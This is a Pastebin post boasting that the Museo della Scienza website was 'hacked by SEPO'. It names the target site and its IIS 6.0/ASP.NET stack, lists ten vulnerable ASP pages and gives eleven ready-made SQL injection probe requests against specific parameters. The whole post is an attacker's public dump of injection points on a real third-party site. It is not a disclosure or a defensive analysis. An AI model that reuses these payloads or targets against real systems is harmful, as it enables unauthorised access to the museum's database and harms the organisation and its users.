sepo

www.museoscienza.org/ hacked by SEPO

Dec 4th, 2011
334
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.29 KB | None | 0 0
  1. Target: http://www.museoscienza.org/
  2.  
  3.  
  4. Server banner Microsoft-IIS/6.0
  5. Operating system Windows Web server IIS 6.0
  6. Technologies ASP.NET
  7.  
  8.  
  9. ========================================================================
  10. SQL injection
  11.  
  12.  
  13. Affected items
  14. /audio/audio.asp
  15. /dipartimenti/catalogo_collezioni/scheda_oggetto.asp
  16. /gallery/gallery.asp
  17. /leonardo/modelli/macchina-leo.asp
  18. /museoingiro/dettaglio.asp
  19. /myTest/vis_test.asp
  20. /news/dettaglio.asp
  21. /scuole/archivio_crei.asp
  22. /scuole/proposta_dett.asp
  23. /video/video.asp
  24.  
  25.  
  26. ex.:
  27. GET /audio/audio.asp?audio=42+and+31337-31337=0
  28. GET /dipartimenti/catalogo_collezioni/scheda_oggetto.asp?idk_in=ST060-00001'+and+31337-31337='0&arg=Astronomia
  29. GET /gallery/gallery.asp?gallery=139+and+31337-31337=0
  30. GET /leonardo/modelli/macchina-leo.asp?id_macchina=11+and+31337-31337=0
  31. GET /museoingiro/dettaglio.asp?id_mig=49+and+31337-31337=0&archivio=no
  32. GET /myTest/vis_test.asp?q=30+and+31337-31337=0
  33. GET /news/dettaglio.asp?idnotizia=549+and+31337-31337=0
  34. GET /scuole/archivio_crei.asp?provenienza=3+and+31337-31337=0
  35. GET /scuole/proposta_dett.asp?proposta=2&dip=9&sez=44+and+31337-31337=0&num=7
  36. GET /scuole/proposta_dett.asp?proposta=2&dip=9+and+31337-31337=0&sez=44
  37. GET /video/video.asp?video=64+and+31337-31337=0&cat=LEONARDO
  38.  
  39.  
  40.  
Add Comment
Please, Sign In to add comment